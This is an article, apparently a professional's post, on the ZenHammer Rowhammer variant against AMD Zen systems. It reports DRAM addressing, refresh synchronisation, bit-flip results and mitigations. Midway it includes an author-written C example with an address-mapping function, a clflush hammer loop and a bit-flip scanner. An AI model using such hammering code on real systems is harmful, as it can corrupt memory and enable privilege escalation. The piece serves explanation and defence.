New ZenHammer Memory Attack Exposes Vulnerabilities in AMD Zen CPUs
Ashwin HarishP
Red Teaming | Bug Hunter | Pentester | CTF Player | Researcher | IEEE Member | Full Stack Developer
In a recent development, academic researchers at ETH Zurich have unveiled ZenHammer, a variant of the notorious Rowhammer DRAM attack specifically tailored to target CPUs based on AMD's Zen microarchitecture. This revelation shakes the prior assumption that AMD Zen chips, particularly when paired with DDR5 RAM modules, were less susceptible to Rowhammer attacks.
Rowhammer is a well-documented attack class that exploits a physical property of modern Dynamic Random-Access Memory (DRAM): repeatedly activating (reading) specific rows of memory cells disturbs electrically adjacent rows and induces unintended bit flips, silently altering stored data without ever writing to it. Previous demonstrations focused primarily on Intel and ARM CPUs; ZenHammer is the first demonstration of Rowhammer bit flips on systems built around AMD's Zen microarchitecture.
Two obstacles had previously deterred extensive exploration of Rowhammer on AMD platforms: the complexity of AMD's DRAM addressing schemes (the functions that map a physical address to a DRAM channel, bank and row, which an attacker must know to pick aggressor rows that share a bank with the victim), and the difficulty of synchronizing memory accesses with the DRAM refresh commands that in-DRAM mitigations such as Target Row Refresh (TRR) piggyback on. The ETH Zurich researchers overcame both by reverse-engineering AMD's DRAM addressing functions and devising new synchronization techniques that time their access patterns against the refresh commands.
A further critical aspect of their approach was optimizing the memory access patterns to boost the row activation rate, i.e. the number of DRAM row activations that can be issued within one refresh interval, which is the decisive factor for whether a Rowhammer attack succeeds. With these optimizations the researchers induced bit flips on DDR4 devices with both AMD Zen 2 (Ryzen 5 3600X) and Zen 3 (Ryzen 5 5600G) platforms: bit flips were found on 7 of the 10 DDR4 devices tested on Zen 2 and on 6 of the 10 tested on Zen 3.
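The two ingredients described above, a DRAM address mapping used to choose aggressor rows and a cache-bypassing hammer loop that maximizes row activations, are easier to reason about in code. The following is an added example written for this article; it is not ZenHammer's code, and the XOR bank functions and row shift it uses are assumed for illustration, not AMD's reverse-engineered functions. The hammer loop flushes each aggressor line from the cache so that every read is served from DRAM (one row activation), and the scanner counts flipped bits in the victim row by comparing it against the pattern it was filled with.

```c
/* Added example: Rowhammer building blocks (not ZenHammer's own code). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 1. XOR-based DRAM address mapping.
 * ASSUMPTION: these masks and the row shift are illustrative only; real
 * platforms (including AMD Zen) use different, reverse-engineered functions.
 * Each bank bit is the XOR (parity) of the physical-address bits in its mask. */
#define N_BANK_FN 4
static const uint64_t BANK_FN[N_BANK_FN] = {
    (1ULL << 13) | (1ULL << 17),
    (1ULL << 14) | (1ULL << 18),
    (1ULL << 15) | (1ULL << 19),
    (1ULL << 16) | (1ULL << 20),
};
#define ROW_SHIFT 17 /* assumed: row index = physical address >> 17 */

unsigned dram_bank(uint64_t paddr) {
    unsigned bank = 0;
    for (int i = 0; i < N_BANK_FN; i++)
        bank |= (unsigned)__builtin_parityll(paddr & BANK_FN[i]) << i;
    return bank;
}

uint64_t dram_row(uint64_t paddr) { return paddr >> ROW_SHIFT; }

/* Two addresses form a useful aggressor pair only if they sit in the same
 * bank but in different rows; same-row accesses just hit the row buffer and
 * cause no further activations. */
int same_bank_different_row(uint64_t a, uint64_t b) {
    return dram_bank(a) == dram_bank(b) && dram_row(a) != dram_row(b);
}

/* 2. Cache control: on x86 clflush evicts the line so the next read goes to
 * DRAM; mfence keeps the loads/flushes ordered. Other ISAs: no-op here. */
static inline void flush_line(const volatile void *p) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p;
#endif
}
static inline void fence(void) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("mfence" : : : "memory");
#endif
}

/* Double-sided hammer loop: alternate reads of two aggressors, flushing each
 * afterwards, so every iteration costs two DRAM row activations. Returns the
 * accumulated bytes only to keep the reads from being optimized away. */
unsigned hammer(volatile uint8_t *agg1, volatile uint8_t *agg2, unsigned long iters) {
    unsigned sink = 0;
    for (unsigned long i = 0; i < iters; i++) {
        sink += *agg1;
        sink += *agg2;
        flush_line(agg1);
        flush_line(agg2);
        fence();
    }
    return sink;
}

/* 3. Victim scan: count bits that no longer match the fill pattern. */
unsigned count_bit_flips(const uint8_t *victim, size_t len, uint8_t pattern) {
    unsigned flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (unsigned)__builtin_popcount((unsigned)(victim[i] ^ pattern));
    return flips;
}

/* Toy probe on a heap buffer: page 0 and page 2 are hammered, page 1 is the
 * victim. A real attack resolves virtual to physical addresses (e.g. via
 * /proc/self/pagemap or huge pages) and picks aggressors with
 * same_bank_different_row(); here no mapping is applied, so 0 flips is the
 * expected result. */
unsigned run_probe(unsigned long iters) {
    const size_t page = 4096;
    uint8_t *buf = malloc(3 * page);
    if (!buf) return 0;
    memset(buf, 0x55, 3 * page);
    (void)hammer(buf, buf + 2 * page, iters);
    unsigned flips = count_bit_flips(buf + page, page, 0x55);
    free(buf);
    return flips;
}

int main(void) {
    uint64_t a = 0, b = (1ULL << 17) | (1ULL << 13); /* same bank, next row */
    printf("bank(a)=%u row(a)=%llu bank(b)=%u row(b)=%llu pair=%d\n",
           dram_bank(a), (unsigned long long)dram_row(a),
           dram_bank(b), (unsigned long long)dram_row(b),
           same_bank_different_row(a, b));
    printf("flips in victim page after toy probe: %u\n", run_probe(100000));
    return 0;
}
```

The important design choice is in `same_bank_different_row`: without the address mapping, an attacker cannot tell which of its own pages are DRAM neighbours of the victim, which is why reverse-engineering those functions was a prerequisite for ZenHammer rather than an optimization.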
The researchers also extended their investigation to DDR5 memory on AMD's Zen 4 platform. DDR5 was expected to resist Rowhammer better because of improved in-DRAM mitigations and higher refresh rates, and the results bear that out only partially: of the 10 DDR5 devices tested on a Ryzen 7 7700X system, one still yielded bit flips under ZenHammer. The changes in DDR5, including enhanced Rowhammer mitigations and on-die error correction code (ECC), therefore make bit flips considerably harder to trigger, but do not rule them out.
The implications of ZenHammer are not merely theoretical. Using the bit flips they found, the researchers simulated end-to-end attacks on system security, including corrupting page table entries to gain unauthorized access to memory. In the most alarming demonstration they obtained root privileges on a Zen 3 test system in 93 seconds on average, measured from the discovery of an exploitable bit flip.
For AMD CPU users, the practical defenses are mostly at the platform level rather than in software, because Rowhammer is a physical property of the DRAM itself: apply any BIOS and firmware updates the vendor provides, prefer ECC-capable memory, consider increasing the DRAM refresh rate, and prefer DRAM with built-in Rowhammer mitigations. It is also worth noting that executing these attacks requires detailed knowledge of both the software stack and the memory hardware, which limits who can mount them but does not make them impractical.
As the boundaries between hardware and software vulnerabilities continue to blur, collaborative efforts between academia, industry, and cybersecurity practitioners become imperative to fortify digital ecosystems against evolving threats like ZenHammer.